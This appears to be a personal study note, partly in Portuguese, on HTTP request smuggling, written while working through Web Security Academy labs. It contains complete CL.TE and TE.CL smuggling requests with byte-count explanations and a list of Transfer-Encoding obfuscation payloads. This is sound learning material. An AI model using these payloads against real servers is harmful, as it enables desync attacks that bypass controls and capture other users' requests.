Skip to content

HTTP Request Smuggling

HTTP/1 specification provides two different methods for specifying the length of HTTP messages. it is possible for a single message to use both methods at once, such that they conflict with each other. The specification attempts to prevent this problem by stating that if both the Content-Length and Transfer-Encoding headers are present, then the Content-Length header should be ignored.

Content-Length
Transfer-encoding

Classic request smuggling attacks involve placing both the Content-Length header and the Transfer-Encoding header into a single HTTP/1 request and manipulating these so that the front-end and back-end servers process the request differently. The exact way in which this is done depends on the behavior of the two servers:

Para configurar isso no burp repeater, basta clicar em "inspector" e "request attributes"

qownnotes-media-qNZkCA

CL.TE: the front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header. TE.CL: the front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header. TE.TE: the front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.

Example:

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 30
Connection: keep-alive
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
Foo: x
  1. CL.TE. Behavior - Montei a seguinte requisição para realizar o exercício.
POST / HTTP/1.1
Host: 0ab7007003e4da9d80cb1c1700260069.web-security-academy.net
Content-Length: 8
Connection: keep-alive
Transfer-Encoding: chunked

0

G

OBS: Vide que o Content-Length deve deter o tamanho a considerar da seguinte maneira: /n + 0/n +/n + G/n. Quero dizer que o salto de linha também deve ser considerado para contar o número de bytes a ser informado no cabeçalho Content-Length

Outro ponto a ser considerado é que o HTTP deve estar na versão 1 ou 1.1 do protocolo.

  1. TE.CL. Behavior - Com a requisição abaixo eu consegui executar o exercício 
POST / HTTP/1.1
Host: 0acd009a0334db86801d4e3800880056.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Length: 4
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

5e
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

x=123
0

Explicações:

Content-Length:4 = Tamanho do payload da primeira requisição, sendo 4 bytes por ser "\r\n5e"

5e = Tamanho da requisição maliciosa que vai desde (de trás para frente)... "321=x\r\n\r\n41 :htgneL... até / TSOP"

Content-Length: 14 = Tamanho do payload dentro da requisição maliciosa, sendo: "\r\nx=123\r\n0\r\n\r\n"

  1. TE.TE Behavior

Possíveis payloads:

Transfer-Encoding: xchunked

Transfer-Encoding : chunked

Transfer-Encoding: chunked
Transfer-Encoding: x

Transfer-Encoding:[tab]chunked

[space]Transfer-Encoding: chunked

X: X[\n]Transfer-Encoding: chunked

Transfer-Encoding
: chunked